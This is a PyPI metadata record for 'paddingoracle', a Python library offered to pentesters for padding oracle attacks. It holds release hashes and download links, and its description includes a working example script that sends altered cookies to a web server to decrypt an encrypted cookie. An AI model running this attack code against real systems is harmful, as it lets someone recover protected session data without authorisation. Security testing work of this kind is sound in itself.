{ "info": { "author": "Marcin Wielgoszewski", "author_email": "marcin.wielgoszewski@gmail.com", "bugtrack_url": null, "classifiers": [ "License :: OSI Approved :: BSD License", "Programming Language :: Python" ], "description": "python-paddingoracle: A portable, padding oracle exploit API\n============================================================\n\npython-paddingoracle is an API that provides pentesters a customizable\nalternative to `PadBuster`_ and other padding oracle exploit tools that can't\neasily (without a heavy rewrite) be used in unique, per-app scenarios. Think\nnon-HTTP applications, raw sockets, client applications, unique encodings, etc.\n\nUsage:\n------\n\nTo use the paddingoracle API, simply implement the **oracle()** method from the\nPaddingOracle API and raise a **BadPaddingException** when the decrypter\nreports a padding error. To decrypt data, pass raw encrypted bytes to\n**decrypt()** with a block size (typically 8 or 16) and an optional iv parameter.\n\nSee below for an example (from `the example`_): ::\n\n from paddingoracle import BadPaddingException, PaddingOracle\n from base64 import b64encode, b64decode\n from urllib import quote, unquote\n import requests\n import socket\n import time\n\n class PadBuster(PaddingOracle):\n def __init__(self, **kwargs):\n super(PadBuster, self).__init__(**kwargs)\n self.session = requests.Session()\n self.wait = kwargs.get('wait', 2.0)\n\n def oracle(self, data, **kwargs):\n somecookie = quote(b64encode(data))\n self.session.cookies['somecookie'] = somecookie\n\n while 1:\n try:\n response = self.session.get('http://www.example.com/',\n stream=False, timeout=5, verify=False)\n break\n except (socket.error, requests.exceptions.RequestException):\n logging.exception('Retrying request in %.2f seconds...',\n self.wait)\n time.sleep(self.wait)\n continue\n\n self.history.append(response)\n\n if response.ok:\n logging.debug('No padding exception raised on %r', somecookie)\n return\n\n # An HTTP 500 error was 
returned, likely due to incorrect padding\n raise BadPaddingException\n\n if __name__ == '__main__':\n import logging\n import sys\n\n if not sys.argv[1:]:\n print 'Usage: %s ' % (sys.argv[0], )\n sys.exit(1)\n\n logging.basicConfig(level=logging.DEBUG)\n\n encrypted_cookie = b64decode(unquote(sys.argv[1]))\n\n padbuster = PadBuster()\n\n cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8))\n\n print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))\n\n\nCredits\n-------\npython-paddingoracle is a Python implementation heavily based on `PadBuster`_,\nan automated script for performing Padding Oracle attacks, developed by\nBrian Holyfield of Gotham Digital Science.\n\n.. _`the example`: https://github.com/mwielgoszewski/python-paddingoracle/blob/master/example.py\n.. _`PadBuster`: https://github.com/GDSSecurity/PadBuster\n", "description_content_type": null, "docs_url": null, "download_url": "UNKNOWN", "downloads": { "last_day": -1, "last_month": -1, "last_week": -1 }, "home_page": "https://github.com/mwielgoszewski/python-paddingoracle", "keywords": null, "license": "UNKNOWN", "maintainer": null, "maintainer_email": null, "name": "paddingoracle", "package_url": "https://pypi.org/project/paddingoracle/", "platform": "UNKNOWN", "project_url": "https://pypi.org/project/paddingoracle/", "project_urls": { "Download": "UNKNOWN", "Homepage": "https://github.com/mwielgoszewski/python-paddingoracle" }, "release_url": "https://pypi.org/project/paddingoracle/0.2.2/", "requires_dist": null, "requires_python": null, "summary": "A portable, padding oracle exploit API", "version": "0.2.2" }, "last_serial": 1947460, "releases": { "0.2": [ { "comment_text": "", "digests": { "md5": "1e0030b6dc92587cdf51cf8796906e60", "sha256": "95444740f1ecf78ac7799069ada9abadb77b121217c6fdef2a81802f8c2403bf" }, "downloads": -1, "filename": "paddingoracle-0.2-py2.7.egg", "has_sig": false, "md5_digest": "1e0030b6dc92587cdf51cf8796906e60", "packagetype": "bdist_egg", 
"python_version": "2.7", "requires_python": null, "size": 8057, "upload_time": "2013-11-07T17:11:21", "url": "https://files.pythonhosted.org/packages/68/b2/96cf268a0f1844b3ddb4b9839b49eadb98bcb2fac177f1ea50658bafae51/paddingoracle-0.2-py2.7.egg" }, { "comment_text": "", "digests": { "md5": "e01748f4f4173ce56ee16165b245f940", "sha256": "b30fc78b2138b049e61c882b3752c1d8019520a7e9e76eeb8083341e5dc47fe7" }, "downloads": -1, "filename": "paddingoracle-0.2.tar.gz", "has_sig": false, "md5_digest": "e01748f4f4173ce56ee16165b245f940", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5022, "upload_time": "2013-11-07T17:11:19", "url": "https://files.pythonhosted.org/packages/8c/d4/0f0f5919042f9cde5cfc3abde09ddca0f84b0d38838b91d941f6790ef46f/paddingoracle-0.2.tar.gz" } ], "0.2.1": [ { "comment_text": "", "digests": { "md5": "357171b263ca40cd74cb40a0d209b64a", "sha256": "60a8d3e5579fea914659d16f0b6e83a26f0cb03f9339760a11f29a25e00a3aeb" }, "downloads": -1, "filename": "paddingoracle-0.2.1.tar.gz", "has_sig": false, "md5_digest": "357171b263ca40cd74cb40a0d209b64a", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5084, "upload_time": "2014-11-25T14:07:36", "url": "https://files.pythonhosted.org/packages/65/55/2d52e12e9196958f7e2529cb4683b2e9cbc1e14f7fe411ebb1abb3348c79/paddingoracle-0.2.1.tar.gz" } ], "0.2.2": [ { "comment_text": "", "digests": { "md5": "eb6224f3fdda27a7b3c6d9f21f7c8541", "sha256": "0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2" }, "downloads": -1, "filename": "paddingoracle-0.2.2-py2-none-any.whl", "has_sig": false, "md5_digest": "eb6224f3fdda27a7b3c6d9f21f7c8541", "packagetype": "bdist_wheel", "python_version": "2.7", "requires_python": null, "size": 5593, "upload_time": "2016-02-09T13:36:55", "url": "https://files.pythonhosted.org/packages/48/46/198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f/paddingoracle-0.2.2-py2-none-any.whl" }, { "comment_text": "", 
"digests": { "md5": "f59e537b890a0ba6cbfaa9bd68dc5d50", "sha256": "bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d" }, "downloads": -1, "filename": "paddingoracle-0.2.2.tar.gz", "has_sig": false, "md5_digest": "f59e537b890a0ba6cbfaa9bd68dc5d50", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5255, "upload_time": "2016-02-09T13:36:31", "url": "https://files.pythonhosted.org/packages/74/8d/b12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507/paddingoracle-0.2.2.tar.gz" } ] }, "urls": [ { "comment_text": "", "digests": { "md5": "eb6224f3fdda27a7b3c6d9f21f7c8541", "sha256": "0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2" }, "downloads": -1, "filename": "paddingoracle-0.2.2-py2-none-any.whl", "has_sig": false, "md5_digest": "eb6224f3fdda27a7b3c6d9f21f7c8541", "packagetype": "bdist_wheel", "python_version": "2.7", "requires_python": null, "size": 5593, "upload_time": "2016-02-09T13:36:55", "url": "https://files.pythonhosted.org/packages/48/46/198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f/paddingoracle-0.2.2-py2-none-any.whl" }, { "comment_text": "", "digests": { "md5": "f59e537b890a0ba6cbfaa9bd68dc5d50", "sha256": "bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d" }, "downloads": -1, "filename": "paddingoracle-0.2.2.tar.gz", "has_sig": false, "md5_digest": "f59e537b890a0ba6cbfaa9bd68dc5d50", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5255, "upload_time": "2016-02-09T13:36:31", "url": "https://files.pythonhosted.org/packages/74/8d/b12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507/paddingoracle-0.2.2.tar.gz" } ] }